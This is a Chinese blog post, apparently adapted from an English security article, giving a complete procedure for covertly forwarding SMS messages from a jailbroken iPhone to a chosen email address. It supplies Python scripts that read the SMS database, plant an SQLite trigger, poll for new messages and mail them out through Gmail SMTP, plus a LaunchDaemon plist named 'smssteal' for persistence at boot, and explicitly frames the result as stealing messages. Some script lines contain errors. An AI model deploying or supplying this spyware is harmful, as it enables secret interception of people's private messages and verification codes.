iPhone上将短信内容发送到指定邮箱的方法

迄今为止，移动应用安全基本聚焦在以下几个方面，一是移动设备管理BYOD（bring your own device），二是移动恶意软件分析，三是移动设备用户隐私安全，四是移动操作系统内核漏洞挖掘。对普通用户而言，窃取用户隐私数据的恶意软件是很大的威胁。本篇文章旨在介绍一种如何将设备上的短信发送到指定邮箱中的方法，方法来自Forwarding SMS to Email on Jailbroken iOS

实验环境

1.iOS 5.1.1越狱设备

2. 通过cydia安装 python 2.7.3

3. 通过cydia安装SQLite 3.x

4. 通过Cydia安装adv-cmds

一、使用python脚本读取sms.db数据库中存储的短信内容

iOS 短信存储在系统的/var/mobile/Library/SMS/文件夹中，包含3个主要文件:

（1）sms.db，标准的SQLite 3格式,存储主要的短信数据

（2）sms.db-shm, "Associate File"

（3）sms.db-wal. “Write Ahead Log"

danimato-iPod:/var/mobile/Library/SMS root# file sms.db
sms.db: SQLite 3.x database

danimato-iPod:/var/mobile/Library/SMS root# file sms.db-shm
sms.db-shm: data

/var/mobile/Library/SMS root# file sms.db-wal
sms.db-wal: data

我们使用SQLite Database Browser打开sms.db,并执行查询语句，会发现如下错误

于是，我们可以使用strings命令查看一下这个文件里面的内容（strings命令在初步分析文件时很有用）

danimato-iPod:/var/mobile/Library/SMS root# strings sms.db >smsdb

打开smsdb文件，可以看到短信message表结构，如下所示

CREATE TABLE message (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, address TEXT, date INTEGER, text TEXT, flags INTEGER, replace INTEGER, svc_center TEXT, group_id INTEGER,association_id INTEGER, height INTEGER, UIFlags INTEGER, version INTEGER, subject TEXT,country TEXT, headers BLOB, recipients BLOB, read INTEGER, madrid_attributedBody BLOB,madrid_handle TEXT, madrid_version INTEGER, madrid_guid TEXT, madrid_type INTEGER,madrid_roomname TEXT, madrid_service TEXT, madrid_account TEXT, madrid_account_guid TEXT,madrid_flags INTEGER, madrid_attachmentInfo BLOB, madrid_url TEXT, madrid_error INTEGER,is_madrid INTEGER, madrid_date_read INTEGER, madrid_date_delivered INTEGER)

我们可以使用python脚本smsDBQuer.py（注意：原脚本不支持中文，需要改变一下）来查询一下该表中的数据，如下所示输出未读短信数量及内容

#!/usr/bin/python
# smstest.py
# by KrishnaChaitanya Yarramsetty
# www.foundstone.com

import sqlite3 as lite
import sys
import smtplib

smspath="/var/mobile/Library/SMS/"

con = lite.connect(smspath+'sms.db')
msg=""

with con:
con.row_factory = lite.Row
cur = con.cursor()
cur.execute('SELECT text，adderss from message where read=0 order by date desc')
rows = cur.fetchall()
#data = cur.fetchone()
counter=0
print "Latest displayed first"
for row in rows:
counter+=1
print "Unread Message: %s" % counter

textencode = row["text"].encode('gb2312')
print "Text: %s" % textencode

addressdecode = row["address"].encode('gb2312')
print "Address: %s" % addressdecode
#print "Text: %s" % row["text"]
msg=row["text"]

我们将smsDBQuery.py脚本上传到设备/var/mobile/Library/SMS/目录下

danimato-iPod:/var/mobile/Library/SMS root# chmod +x smsDBQuery.py

danimato-iPod:/var/mobile/Library/SMS root# python smsDBQuery.py

运行结果如下：

二、窃取iPhone短信信息

接下来演示如何将iPhone上短信信息转发到指定邮箱中

1. smsCreateTrigger.py脚本

#!/usr/bin/python
# smstrigger.py
# by KrishnaChaitanya Yarramsetty
# www.foundstone.com

import sqlite3 as lite
import sys

smspath="/var/mobile/Library/SMS/"

con = lite.connect(smspath + 'sms.db')

with con:
con.row_factory = lite.Row
cur = con.cursor()

#cur.execute('DROP TABLE message2;')
#cur.execute('DROP TRIGGER insert_newest_message_email;')
cur.execute('CREATE TABLE message2 (ROWID INTEGER PRIMARY KEY, address TEXT, date INTEGER, text TEXT, emailsent INTEGER);')
cur.execute('CREATE TRIGGER insert_newest_message_email AFTER INSERT ON message WHEN new.ROWID >= 0 BEGIN INSERT INTO "message2" select ROWID,address,date,text,0 from message where ROWID=new.ROWID; END;')
print 'Done.'

我们将smsCreateTrigger.py上传到设备/var/mobile/Library/SMS/目录下，修改执行权限，并运行

danimato-iPod:/var/mobile/Library/SMS root# chmod +x smsCreateTrigger.py

danimato-iPod:/var/mobile/Library/SMS root# python smsCreateTrigger.py
Done.

该脚本的功能是当message表有记录增加时，将新增记录插入新创建的message2表中

2.smsWatcher.py 脚本

#!/usr/bin/python
# smsread.py
# by KrishnaChaitanya Yarramsetty
# www.foundstone.com

import sqlite3 as lite
import sys
import smtplib
import time

def sendEmail(msg):
fromaddr = 'abc@gmail.com'
toaddrs = 'xyz@gmail.com'

# Credentials
username = 'abc'
password = '****'

# The actual mail send snippet
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(username,password)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()

#Set path for SMS directory
#smsfromaddress will be used a filter. filter restricts only to those sms that have FROM address as mentioned below. FROM addresses can be multiple as well.
#"address" is the column name.

smspath="/var/mobile/Library/SMS/"
smsfromaddress=('AXARWINF','6564567890',)

#Poll for any new messages waiting to be delivered in an infinite loop with 60 second interval.
#though it is not one of the efficient methods, considering the purpose of the script it was taken for granted

while 1==1:
#Connect to the database and read sms from 'message2' table.
con = lite.connect(smspath+'sms.db')
with con:
con.row_factory = lite.Row
cur = con.cursor()
cur2 = con.cursor()
cur.execute('SELECT * from message2 where emailsent=0 and address=?',smsfromaddress)
rows = cur.fetchall()
for row in rows:
msg='Address is ' + row["address"] + ' Text Message is ' + row["text"].encode('gb2312')
sendEmail(msg)
ROWID = (row["ROWID"],)
cur2.execute('UPDATE message2 SET emailsent=1 WHERE ROWID=?', ROWID)
con.commit()
time.sleep(60)

该脚本的功能是将messge2表中指定短信发送到指定邮箱中，我们需要修改脚本中用来接收SMS短信的邮箱相关信息

fromaddr = 'danqingdani@gmail.com' #发件人地址
toaddrs = '335451997@qq.com' #收件人地址

username = 'danqingdani@gmail.com' #发件人邮箱名
password = '****'#发件人邮箱密码

server = smtplib.SMTP('smtp.gmail.com:587')#发件邮件服务器

smsfromaddress=('AXARWINF','6564567890',)#指定你想窃取的短信来自哪里

上传smsWatcher.py到设备/var/mobile/Library/SMS/目录下，修改执行权限，并在后台运行

danimato-iPod:/var/mobile/Library/SMS root# chmod +x smsWatcher.py
danimato-iPod:/var/mobile/Library/SMS root# python smsWatcher.py &
[1] 4819

当运行上面两个脚本的iPhone有新的短信信息时，短信内容就会发送到你指定的邮箱中去了

3.设置脚本开机自动启动

上述脚本如果要常驻系统，开机自动启动，需要做以下设置，首先在/var/mobile/Library/SMS目录下编写一个bash脚本启动smsWatcher.py

danimato-iPod:/var/mobile/Library/SMS root# cat smsWatcher
#!/bin/bash
python /var/mobile/Library/SMS/smsWatcher.py

danimato-iPod:/var/mobile/Library/SMS root# cat smsWatcher
danimato-iPod:/var/mobile/Library/SMS root# chmod +x smsWatcher

然后在/System/Library/LaunchDaemons目录下编写一个plist配置文件，配置开机自动启动

danimato-iPod:/System/Library/LaunchDaemons root# cat com.dani.smssteal.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN""http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.dani.smssteal</string>
<key>Program</key>
<string>/var/mobile/Library/SMS/smsWatcher</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>

danimato-iPod:/System/Library/LaunchDaemons root# launchctl load/System/Library/LaunchDaemons/com.dani.smssteal.plist

有iPhone的朋友可以试一试，欢迎交流

参考资料：

http://blog.opensecurityresearch.com/2013/02/forwarding-sms-to-email-on-jailbroken.html

iPhone上将短信内容发送到指定邮箱的方法相关推荐

通过短信猫发送手机短信
wavecom短信猫常用AT命令一.一般命令 1. AT+CGMI 给出模块厂商的标识. 2. AT+CGMM 获得模块标识.这个命令用来得到支持的频带 (GSM 900,DCS 1800 或PCS ...
前端开发【短信分享】——H5调起短信，发送指定内容到指定号码
目录一.终端调试本地localhost页面 1.网络环境设置 2.查看电脑本地 3.手机访问地址 4.防火墙问题二.项目说明 1.sns短信调起 2.终端发送说明 3.终端判断说明 4.项目源码 ...
html调用短信接口发送消息的实例,HTTP电脑发送短信接口调用示例
一.工作方式双方通过HTTP方式交互数据,第三方可以简单的"name=value"方式发送提交内容或响应请求内容.即通过HTTP的GET/POST方式交换. 另外双方需要保证数据 ...
Android 调用系统发短信界面，给指定号码发短信，并带短信内容
工具类如下ContentUtil.java: package com.zhoucj.messagedemo.util; import android.content.Context; import a ...
ios10 android 短信,ios10系统短信怎么发送手写内容？ios10短信发送手写内容教程[多图]...
ios10又有新功能啦啦!!小伙伴们赶紧奔走呼号,ios10系统短信可以发送手写内容,听起来就很酷炫!ios10系统短信怎么发送手写内容?来看看ios10短信发送手写内容教程吧! ios10系统短信怎 ...
Android发送短信时短信内容超长处理
Android发送短信时短信内容超长处理一条短信只可容纳70个中文,所以当短信长度超过70个中文字符时程序就要特殊处理了. 通常有两种方式: 一.通过sendTextMessage()方法逐条依次 ...
自定义List列表显示短信内容，仿iphone短信气泡
自定义List列表显示短信内容,仿iphone短信气泡短信消息实体类 [java] view plain copy print ? package com.android; /** * 消息实体类 ...
安卓短信功能全解：调用系统短信功能发送短信、彩信，使用SmsManager发送短信，并监听发送短信的投递情况，使用广播接收器监听接收的短信。
全栈工程师开发手册 (作者:栾鹏) 安卓教程全解安卓短信功能全解:调用系统短信功能发送短信.彩信,使用SmsManager发送短信,并监听发送短信的投递情况,使用广播接收器监听接收的短信. 首先需要 ...
美橙互联短信服务——发送注册短信并验证
接口层 package com.demo.service;import com.demo.common.JsonResult;public interface SendService {/*** 发送 ...

iPhone上将短信内容发送到指定邮箱的方法

iPhone上将短信内容发送到指定邮箱的方法相关推荐

最新文章

热门文章